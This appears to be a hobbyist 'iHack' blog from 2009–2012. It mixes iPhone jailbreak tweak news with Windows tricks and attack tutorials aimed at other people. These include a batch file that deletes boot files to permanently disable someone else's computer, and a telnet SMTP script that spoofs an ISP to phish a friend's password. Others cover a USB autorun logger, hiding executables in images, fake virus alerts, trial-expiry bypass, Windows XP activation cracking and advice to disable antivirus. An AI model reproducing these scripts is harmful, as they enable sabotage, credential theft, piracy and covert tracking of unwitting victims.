Showing posts with label iHack. Show all posts
Showing posts with label iHack. Show all posts

Sunday, February 19, 2012

Sara- The Best Alternative to 'Siri'


Since the release of the iPhone 4S and its awesome intelligent voice assistant Siri, every older iPhone device owner has been trying to get Siri on his iPhone. As you know, developers have successfully managed to port Siri to older devices. However,it couldn’t be made public.

A while after, Spire was released promising Siri port to older devices, iPhone 4, 3GS.iPod touch 4G,3G but it required a Siri proxy and iPhone 4S authentication keys which is not an easy task for many users. A Vietnamese team has developed a new Siri more advanced alternative named “Sara”. In addition to the normal Siri capabilities like setting reminders making calls, Sara allows users to train it to accept commands. Sara is described as having an “open” brain allowing developers to create plug-ins for special commands. If Sara proves success,it won`t be long before we see a lot of plugins released. Another cool feature about Sara is that it works in a number of countries other than the US and it is available in 37 languages in only a month’s development.That is something that Siri lacks. We are not sure if Sara can indeed beat the almighty Siri,but we will have to wait and see in a couple of month how it would turn out. To get Sara, just add this repository to Cydia http://isoftjsc.com and download the version supporting your device.
(Via)

Wednesday, February 15, 2012

Send Files From Your iPhone To Any Device Via Bluetooth Using AirBlue For iOS 5


We have been noticing many Cydia Tweaks since the iOS 5.0.1 Jailbreak is available. Some are free and some paid, but all of them are of course very useful. But today we have a very useful Cydia Tweak called AirBlue Sharing which allows iPhone, iPod and iPad users running iOS 4.0 and above to send and receive files from any devices, even Android. Yes this Cydia tweak actually does that. AirBlue Sharing for iPhone, iPod and iPad eliminates one of the main disadvantages which they have till now. Users now can share and receive files from any non iOS devices including Symbian, Windows Phone, and Blackberry, Android or any other device.

AirBlue Sharing allows you to share/receive any Video, Picture, Music, Contacts, Notes or any other file on your iDevice. The transfer takes place at a very high speed which is up to 1.7MB/s. Since files can be transferred using Bluetooth and WiFi to any device, you can also include your Windows, Linux or Mac PC in the list. AirBlue Sharing has this capability which can automatically detect the best way to transfer the files. One of the main features of AirBlue Sharing which I would like to mention is, it allows you to send/receive multiple files at the same time. Which means you does not need to be in a queue.

We have been noticing many Cydia Tweaks since the iOS 5.0.1 Jailbreak is available. Some are free and some paid, but all of them are of course very useful. But today we have a very useful Cydia Tweak called AirBlue Sharing which allows iPhone, iPod and iPad users running iOS 4.0 and above to send and receive files from any devices, even Android. Yes this Cydia tweak actually does that. AirBlue Sharing for iPhone, iPod and iPad eliminates one of the main disadvantages which they have till now. Users now can share and receive files from any non iOS devices including Symbian, Windows Phone, and Blackberry, Android or any other device. AirBlue Sharing allows you to share/receive any Video, Picture, Music, Contacts, Notes or any other file on your iDevice. The transfer takes place at a very high speed which is up to 1.7MB/s. Since files can be transferred using Bluetooth and WiFi to any device, you can also include your Windows, Linux or Mac PC in the list. AirBlue Sharing has this capability which can automatically detect the best way to transfer the files. One of the main features of AirBlue Sharing which I would like to mention is, it allows you to send/receive multiple files at the same time. Which means you does not need to be in a queue. Features of AirBlue Sharing for iPhone, iPod and iPad File transfer to any non iDevice Send files using Bluetooth/WiFi High speed transfer Multiple File Sharing Compatible with iOS 4.0 to iOS 5.0.1 So is AirBlue Sharing for iPhone, iPod and iPad free? No, you have to pay the amount which is $4.99 and I think that’s worth paying because it works perfectly fine and is the best solution available for Bluetooth/WiFi sharing. To buy you can simply go to the BigBoss repository and make a purchase.

Friday, November 26, 2010

Scare your friends with virus alerts

Step 1. Open up notepad

Step 2. Type  lol=msgbox("Whatever you want message to say",20,"Whatever you want the window to be titled") 
Eg: lol=msgbox("Warning your computer has been infected by a virus ",20,"Virus Alert")  

Step 3. Save the text as Whateveryouwant.vbs  The number 20 represents the type of window style the message will be in. You can experiment with different styles you want.

Sunday, November 7, 2010

Shutdown a Computer For Ever (NOT YOURS)

Open up notepad and copy and paste the codes given below. Save it as a .bat file.To do this click on Save As.Select all file types and give the name as something.bat.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:
tldr
del c:
tldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

This should shut down the computer on which the file will be executed. It shuts it off once and deletes the files needed to reboot and restart. Have fun …njoy!!

REMEMBER – DO NOT CLICK THIS FILE. YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Friday, November 5, 2010

Add a folder to 'Send to' Menu

Hey friends,u might have noticed the need to copy and paste some files constantly to a single folder. It would be very helpful if the folder existed in 'Send to' menu.Doing this is very simple.Here are the following steps we need to follow.
Step 1:Go to Folder Options in Tools.
Step 2: Show Hidden Folders.
Step 3:Go to C:\Documents and Settings\user name
Step 4:Now go to Send To folder and paste the shortcut of the Folder u want in the 'Send to' menu.

Happy 'Sending to' your desired Folders...

Wishing you all a "HAPPY DIWALI"

Monday, November 1, 2010

Lock your Folder without any Software

This is a different way to lock up ur folder without using any software
This is not hiding ur folder but locking it..using batch file...

What is batch file???
It is this file (command.com) which handles all DOS commands that you
give at the DOS prompt---such as COPY, DIR, DEL etc.

code...

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==pass goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Steps to do it........
1) Copy the give code in a note pad and save the note pad in your pc with the name lock.bat (that is with the extension of .bat). You can replace the lock portion with anything u want. (Default password is pass.Search for pass in the code and change it to whatever you want.)

2) A batch file will be created where you have saved. Now double click on it , it will make a folder with the name Locker at the same place where the batch file is save.If you want another name replca Locker in the code with the name you want.

3) Now add the files you want to be locked in that folder.

4) Double click on the batch file. It will ask for locking the folder formed. Type y(yes). The folder will be locked and hidden.

5) To unlock,double click on batch file again and enter the password in the new window opened.
Download the batch file.

How to hide a file in a image

1. Gather the file you wish to bind, and the image file, and place them in a folder. For the sake of this demonstration, I will be using
C:New Folder

-The image will hereby be referred to in all examples as image.jpg
-The file will hereby be referred to in all examples as New Text Document.txt

2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:New Folder]

5. Type copy /b image.jpg + secret.rar image.jpg

Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file, there are two options that you can take

a) Change the file extension from image.jpg to image.rar, then open and your file is there.
b) Leave the file extension as is, right click, open with WinRar and your file is there.

In this way you can bind .exe files with any file.. happy hacking with binding exe files..

Tuesday, October 19, 2010

Operate mouse pointer without mouse

Want To have fun With Mouse Cursor. Just Follow the Steps Below.

Iam giving you a trick

Press Left Alt + Left Shift + Num Lock Button + Ok

with the help of Numeric Keypad e.g ( Press and Hold the following Keys )

7          8          9

4                      6

1          2          3   



For Normal Click Press 5

Default
Left Alt + Left Shift + Num Lock

Display A Notice at the Startup of your Computer

If your PC has multiple users then you can now display legal notice to every user before they login to your PC. This legal notice will be displayed at every startup just before the Desktop is loaded. Using this you can tell your friends about the do’s and dont’s in your computer when they login in your absence. Well you can do this pretty easily. For this there is one small registry hack. Here is the step-by-step instruction to do this.
1. Go to Start->Run, type regedit and hit ENTER


2. Navigate to the following key in the registry



HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\policies\system


On the right side pane look for “legalnoticecaption“, double click on it and enter the desired Legal Notice Caption.

3. Next below this look for “legalnoticetext” and enter the desired Legal Notice Text. The legal notice text can be up to a page in it’s size so that it can include a set of do’s and dont’s for your computer.

4. After you do this just restart your computer and upon the next startup you can see the legal notice information for your computer. This trick works on both XP and Vista. You can also try it on Windows 7 and should work with no problems.

Monday, October 18, 2010

Information Gathering through USB drives

There are few ways to Hack Passwords using a USB Drive or Pen Drive.
Here is one of them..


Create an autorun.inf file on the root of your flash drive/Pendrive with the following contents:

[autorun]
open=username.bat
action=Open folder to view files

Now, create a batch file called username.bat with the following contents:

@echo off
echo %username%>>users.dat
date /t>>users.dat
time /t>>users.dat
start "Explorer" %SystemRoot%\explorer.exe

Create username.bat and autorun.inf in the root of your pendrive

Save both file and you are good to go. Now whenever a user plugs your pendrive into their PC,it will display an autoplay option indicating that they have to click on the icon to open the drive to view its contents. A small DOS window will flash for a moment and then disappear.Now If you go into the root of the drive, you will find a new file called users.dat which will record the user names of all the users who have accessed your drive by clicking on the icon. You can open the DAT file using notepad and view its contents.

However..This is not a fool proof method as some geeks disable the autoplay option (or disable writing to USB drives) ,or they just bypass it by pressing RIGHT SHIFT key when the pendrive is connected and hence their name will not be recorded or they can delete the users.dat file. But that said,it will work fine nevertheless......

Alternatively, you can also use a Software USB HACK, but that will give you some problems as your Anti-Virus will keep deleting it.

And turning off anti-virus, specially when you are doing this kind of work, is highly not recommended.

Monday, July 5, 2010

Make a Shutdown Virus

This is an interesting tutorial in which we will create a fake "virus" which can shutdown, restart and log off your pc(Can also write a message and specify the countdown time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking START>TURNOFF button etc….And you can always do a little mischief by sending it to your friends ;)
1.Create shortcut,(Right click on your desktop and go to new>shortcut)
2.After this will appear window and that is where you type the code.
shutdown -s -t 300 -c "Your Message" -this will shutdown the computer.
 To log of computer type shutdown -l -t 300 -c "your message"
To restart computer type shutdown -r -t 300 -c " your message"
The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.


3. Type the name for the shortcut and click on finish.
4. After this will appear icon on desktop, when someone clicks it, shutdown box will pop up.

5.How can I stop system shutdown ? Go to Start->Run , then open cmd,write shutdown -a and press ENTER on keyboard, as shown below.

Saturday, June 19, 2010

Shocking news about CTRL+C clipboard hacking

Ctrl+C may be the most important work we do everyday. But it's not a very safe thing to do. Read on to know why. What happens when you press Ctrl+C while you are online. We do copy various data by Ctrl + C for pasting elsewhere. This copied data is stored in clipboard and is accessible from the net by a combination of Javascripts and ASP. This is called clipboard hack problem.

Just try this:

1. Copy any text by Ctrl + C

2. Click the Link: Clipboard Hack
(in internet explorer or netscape only)

3. You will see the text you copied was accessed by this web page.

Surprised! I know you are because i was also surprised to see it. Do not keep sensitive data (like passwords, credit card numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information. Forward this information to as many friends as you can, to save them from online frauds!

It is true, text you last copied for pasting (copy & paste) can be stolen when you visit web sites using a combination of JavaScript and ASP (or PHP, or CGI) to write your possible sensitive data to a database on another server.

How Cipboard Hack is done?

The Clipboard hack is done by the following Source Code:

How to safeguard yourself from Clipboard Hack Problem?

To avoid clipboard hack problem, do the following:

1. Go to internet options->security.

2. Press custom level.

3. In the security settings, select disable under Allow paste operations via script.

Now the contents of your clipboard are safe.

Interestingly, this hack works only on internet explorer, and not on Mozilla Firefox browser. Please forward this article to as many friends as you can to make them aware of this issue with CTRL+C.

Friday, August 14, 2009

How to use Trial Version software forever without Expiration

Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.
Image and video hosting by TinyPic
Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.

How it Works
Open Time Stopper
Browse and select .exe of required trial software
Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
Choose any time
Click open software on your selected date
If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.

Download Time Stopper

Sunday, July 5, 2009

Make an Autorun File For Your CD or DVD

If you want to make an autorun file for that CD you are ready to burn just read this...
1) Open a notepad.
2) Now Write:

[autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE

Now save it as any name such as autorun.inf and not autorun.txt.And make sure that in the file type All Files is selected.

But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called *.exe but some are called *.msi
3) Now burn your CD/DVD with the autorun .inf file included.
4) Now set the disk in your CD/DVD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "My Computer".

Note:You can also run a Javascript or any batch file by this process and make it hidden. This is how a pen drive virus is made.

Monday, May 18, 2009

Reveal the passwords behind ****

Ever wanted to know what is behind those ************{password} in any application.for example if you want see and know a password in your yahoo messenger that somebody else have typed and left it or in any other application.
Here is how you do it…

Just download Spine pass view 07 from this url.

Download Spine View

Simply drag the hand over the *** in a text box to reveal the password! Simple, small, quick and free.

CATCH 1:-when you start this application the asterisk writing capability of your system is disabled.

CATCH 2:-some anti virus softwares consider this software as a virus and delete it as soon as loaded so if you want this thing to work then disable your anti virus for sometime.

Note:Use it carefully, disabling the anti virus is not safe.

Saturday, May 9, 2009

Make Your Windows XP Genuine

Disclaimer:This is for educational purposes only.And we should respect Microsoft's fight against piracy
There are two methods to do this.Either Follow Step 1 to 5.
Or,Alternatively download the file from the following link

STEP 1

Open Start/Run... and type the command:
regedit and click "OK" (or press ENTER).

Go to HKey_Local_Machine\Software\Microsoft\WindowsNT\Current Version\WPAEvents,
on the right double click on "oobetimer" and change at least one digit of this value to deactivate windows.

Click "OK" and close the Registry Editor.

STEP 2

Open Start/Run... and type the command:
%systemroot%\system32\oobe\msoobe.exe /a and click "OK" (or press ENTER).

This will bring up the "Activate Windows" window.

Check the option for "Yes, I want to telephone a customer service representative to activate Windows" and click "Next"


STEP 3

Then click "Change Product Key" (don't enter any information on that screen)


STEP 4

Type in the new key and click "Update"


The activate Windows by phone window will reappear at this point, just close it by clicking the X in the upper right hand corner

STEP 5

Reboot your system and Open Start/Run... and type the command:
%systemroot%\system32\oobe\msoobe.exe /a and click "OK" (or press ENTER).

If you see "Windows is already activated" then everything is OK.

ALTERNATE METHOD
Click on the link below
http://www.mediafire.com/?sharekey=df3678ba597904d39bf8d6369220dcabe04e75f6e8ebb871


Hacking Someone's ISP Password

Disclaimer:This post is for educational purposes only!!! Any wrong use of this shall not be my responsibility

1.) Run your telnet program:
on windows , go to START -> RUN -> "TELNET".
on linux , you should open a shell , and write telnet.
2.) Then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!
3.) Now , write the following :

mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".

note: No money will be returned if you don't follow our instructions!

4.) press enter twice and then write "."(without the "") and press ENTER!

--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .

[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?

[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".

[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".

[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"

"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..

* launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".

* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)

* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!